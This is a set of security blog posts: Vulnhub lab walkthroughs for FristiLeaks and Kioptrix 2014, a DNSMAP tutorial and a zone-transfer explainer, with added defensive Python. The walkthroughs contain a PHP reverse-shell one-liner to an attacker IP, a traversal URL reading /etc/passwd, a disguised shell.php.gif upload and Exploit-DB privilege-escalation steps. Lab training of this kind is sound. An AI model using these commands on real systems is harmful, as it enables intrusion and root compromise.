FristiLeaks: 1.3 Vulnhub Walkthrough

Hi, let's see how we rooted Fristi by Ar0xA from Vulnhub.

First, find the IP and do a port scan.

We have only one port open. Let's scan using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing interesting. Right?

We need to find something else. Have a look at the following address.

http://192.168.18.80/fristi/

A login page right?

Let's try breaking it. SQL injection didn't work. There must be some other way. Let's have a look at the source code.

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

We need to look more 🙂 Scroll down to the end.

<!-- 
(long base64-encoded PNG blob omitted)
-->

Looks like this is base64 encoded. Let's try decoding it.

Visit https://www.base64decode.org/ for decoding.

Seems like a PNG image? Let's try decoding it as an image here: https://base64.guru/converter/decode/image/png

We got an Image.

Hopefully this is the password. But what about the username? admin? fristi?

They didn't work. Let's try eezeepz.

Yes. We are logged in now. We have a file upload form here. But it accepts only images.

We need to upload a php shell as an image here.

I used this shell:

https://github.com/melbinkm/PHPImageShell

Rename the file to shell.php.gif and upload.

Fire up Burpsuite and catch the upload request.

Edit the filename in the request to shell.php.gif and send.

We will get a response saying it was uploaded to the uploads directory. Now head to /uploads/shell.php.gif.
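Two steps above are really one defensive lesson: identify a file by its bytes, not by its name. The base64 blob was recognised as a PNG from its first characters, and the upload form that "accepts only images" was fooled by a name ending in .gif. The Python below is an added example, not the Fristi application's code; the signature table and the server-side renaming scheme are my choices.

```python
import base64
import secrets
from pathlib import PurePosixPath

# Byte signatures of the image types the upload form is meant to accept.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}

# Base64 of the eight-byte PNG signature followed by the start of the IHDR
# chunk; every base64-encoded PNG, including the blob above, starts this way.
PNG_B64_PREFIX = "iVBORw0KGgoAAAANSUhEUg=="


def sniff_image_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the leading bytes, else None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def sniff_base64_blob(b64_text: str):
    """Decode a base64 blob and identify it by signature, as done by hand above."""
    return sniff_image_type(base64.b64decode(b64_text))


def validate_upload(filename: str, data: bytes):
    """Return a server-chosen storage name for an upload, or None to reject it.

    The decision rests on the bytes, not on the client-supplied name, and the
    stored name is rebuilt from scratch, so 'shell.php.gif' can never reach the
    web root carrying a '.php' segment the web server might hand to PHP.
    """
    kind = sniff_image_type(data)
    if kind is None:
        return None
    suffixes = [s.lower().lstrip(".") for s in PurePosixPath(filename).suffixes]
    # Policy: exactly one extension, and it must agree with the sniffed type.
    if len(suffixes) != 1 or suffixes[0] not in ALLOWED_EXT:
        return None
    if suffixes[0].replace("jpeg", "jpg") != kind:
        return None
    return f"{secrets.token_hex(8)}.{kind}"
```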

Now we can set up a listener on our Kali machine and connect from this shell.

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now it's time for privilege escalation. Use the command uname -a to find the OS version.

Let's search for an exploit.

What about using this?

https://www.exploit-db.com/exploits/40839

Let's try.

Let's download the file using wget.

Time to compile and run the exploit.

Done! We have a new user firefart with password pass.

Let's see if it is present in /etc/passwd.

Yes, it's there at the top. Now let's switch to our new account and check for root access.

Yes! We are root now. What about the flag?

That's all. It took me a little more time to find the fristi directory, but the privilege escalation part was quick.

Kioptrix: 2014 (#5) Vulnhub Walkthrough

In this blog post we will see how to root the Kioptrix 2014 Machine from Vulnhub.

First, let's find the IP and the open ports on the machine using nmap:

nmap 192.168.18.0-255

Here we have the IP: 192.168.18.76

Port 80 is open, so there will be a web server running. Let's have a look.

Yes, there is a page. Anything behind that? Let's have a look at the source code.

Here we have ‘pChart2.1.3’. Now we need to know what pChart is. Let's do a quick Google search.

The website http://www.pchart.net/ says it is a PHP-based charting library. Now let's look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3:

https://www.exploit-db.com/exploits/31173

Let's try that by visiting the following page.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

We have got the /etc/passwd file displayed in the browser.

Now let's try to read the httpd.conf file.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

It works!
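Why do those two Script values land on /etc/passwd and httpd.conf at all? Once %2f is decoded the parameter is an absolute path, and a naive join of an absolute path onto a base directory simply discards the base. The Python below is an added illustration of that bug class and of a containment check that refuses it; it is not pChart's code, and the examples directory is an assumed path.

```python
import posixpath
from urllib.parse import unquote

# Assumed install directory for the pChart examples (not the real path).
EXAMPLES_DIR = "/var/www/pChart2.1.3/examples"

# The two Script values from the URLs above, exactly as sent.
PASSWD_PAYLOAD = "%2f..%2f..%2fetc/passwd"
HTTPD_PAYLOAD = "%2f..%2f..%2fusr/local/etc/apache22/httpd.conf"


def unsafe_resolve(script_param: str) -> str:
    """Naive join of the decoded parameter onto the examples directory.

    After decoding, the value starts with '/', so posixpath.join throws
    EXAMPLES_DIR away, and normpath collapses the leading '/../..' to '/'.
    The '..' segments are decoration; the absolute path does the work.
    """
    decoded = unquote(script_param)
    return posixpath.normpath(posixpath.join(EXAMPLES_DIR, decoded))


def safe_resolve(script_param: str):
    """Accept only a bare file name that resolves inside EXAMPLES_DIR.

    Returns the normalized path, or None when the request must be refused.
    """
    decoded = unquote(script_param)
    # A script name must not carry path separators or be a dot directory.
    if "/" in decoded or "\\" in decoded or decoded in ("", ".", ".."):
        return None
    candidate = posixpath.normpath(posixpath.join(EXAMPLES_DIR, decoded))
    # Belt and braces: the resolved path must still sit under EXAMPLES_DIR.
    if posixpath.commonpath([EXAMPLES_DIR, candidate]) != EXAMPLES_DIR:
        return None
    return candidate
```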

When we scroll down to the end, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

If our User-Agent header starts with Mozilla/4.0, the directory served on port 8080 will let us in.

Let's try that.

curl -H "User-Agent:Mozilla/4.0" http://192.168.18.78:8080

And the result is,

We have a hyperlink here to /phptax/. Let's try this in a browser.

I’m using a Firefox extension to switch user agents. Get that here:

https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/

I’ve installed the extension and activated the custom user agent for our machine.

Now let's load the page in the browser.

Going inside...

This looks like an app for filling in tax forms. OK, so let's look whether there are any known vulnerabilities in it.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

https://www.exploit-db.com/exploits/21665

Let's try to exploit that with Metasploit.

msfconsole
search phptax

Now let's set the options.

Now enter run to run the exploit.

We got the shell now.

Now use the whoami command to find the current user.

Now use the command /bin/sh -i to get a fully interactive shell.

Let's now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Let's look online for available exploits.

https://www.exploit-db.com/exploits/28718

We have a privilege escalation exploit on Exploit-DB. Let's try that.

Download the exploit to our Kali machine.

wget https://www.exploit-db.com/download/28718 -O exploit.c

Time to send the file to the target machine. The target does not have wget or curl, so we will use netcat to transfer the file.

Let's start a listener on our Kali machine and send the file to the target machine's /tmp directory.

On the target machine,

Now we have the exploit file on our target.

Now let's compile it using gcc.

Time to exploit!

We are root now!

DNSMAP Tutorial, What is it and How to use it?

DNSMAP is a tool for identifying the subdomains of a given domain. It is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments.

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

Installing DNSMAP

If you don't have DNSMAP installed on your machine, install it using the following command.

sudo apt install dnsmap

DNSMAP Usage

Using DNSMAP we can enumerate the subdomains of a domain simply by entering the domain name and specifying a wordlist file, as shown in the example.

In addition, we can export the results to a Comma Separated Values (CSV) file, set a delay between DNS requests and ignore specific IPs in the enumeration process.

If we don't specify a wordlist file, the program will load the default wordlist and use a random waiting time between requests.

dnsmap google.com

Other examples

Specifying a custom wordlist.

dnsmap google.com -w yourwordlist.txt

Specifying a results file.

dnsmap google.com -r dnsmap_results.txt

Specifying a custom delay between requests.

dnsmap google.com -d 3000

DNS Zone Transfer Vulnerability, What is it?

A DNS server is a database that stores IP addresses, domain names and related information. Its primary duty is to resolve domain names to IP addresses.

DNS Zone File

A DNS zone file is a simple text file that holds the data of a domain: the mapping of domain names to IP addresses and other resources. A zone file can contain data about multiple subdomains, and a DNS server can hold zone files for multiple domains.

Master and Slave DNS Servers

A master DNS server is the server which holds the master copy of the zone file. When this file is updated, the slave DNS servers request a copy and update their own zone files.

What is Zone Transfer

DNS zone transfer is the process of copying the DNS information from a master DNS server to a slave DNS server. The primary/master DNS server should allow zone transfers only to its secondary/slave servers. The zone transfer vulnerability arises when the primary server allows zone transfers to anyone who requests them.

By exploiting this vulnerability, attackers can get a copy of the zone file. This may not have a direct impact on the organization, but the attackers can collect a lot of information about IP addresses and hostnames, which helps them plan how to break into the organization.
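On the defending side, the misconfiguration described above is visible in the name server's own configuration before anyone asks for an AXFR. The Python below is an added example, not part of the post: it walks a BIND named.conf and reports every primary zone whose effective allow-transfer ACL contains `any`. The named.conf fragment is constructed, and the regexes assume the usual layout where each top-level block closes with `};` at the start of a line.

```python
import re

# Constructed named.conf fragment (not from any real server): one zone hands
# its data to anyone, one restricts transfers to its secondary, one is silent
# and inherits the options-level setting.
SAMPLE_NAMED_CONF = """
options {
    allow-transfer { none; };
};
zone "leaky.example" IN {
    type master;
    allow-transfer { any; };
};
zone "tight.example" IN {
    type master;
    allow-transfer { 192.0.2.53; };
};
zone "silent.example" IN {
    type master;
};
"""

# Top-level options/zone blocks close with '};' at the start of a line.
BLOCK_RE = re.compile(r'^(options|zone\s+"([^"]+)")[^{]*\{(.*?)^\};', re.S | re.M)
XFER_RE = re.compile(r"allow-transfer\s*\{([^}]*)\}")

def transfer_acl(block_body):
    """allow-transfer entries of one block as a list, or None if not set."""
    m = XFER_RE.search(block_body)
    return None if m is None else [t.strip() for t in m.group(1).split(";") if t.strip()]

def audit_zone_transfers(named_conf):
    """Map each primary zone to 'open', 'restricted' or 'unset'; 'open' means the
    effective allow-transfer ACL contains 'any' (the vulnerability described above)."""
    global_acl, verdicts = None, {}
    for m in BLOCK_RE.finditer(named_conf):
        header, zone, body = m.groups()
        if header == "options":
            global_acl = transfer_acl(body)
            continue
        if re.search(r"type\s+(master|primary)\s*;", body) is None:
            continue  # secondaries and stubs are not the authoritative copy
        acl = transfer_acl(body)
        effective = acl if acl is not None else global_acl
        if effective is None:
            verdicts[zone] = "unset"  # BIND's version-dependent default applies
        else:
            verdicts[zone] = "open" if "any" in effective else "restricted"
    return verdicts
```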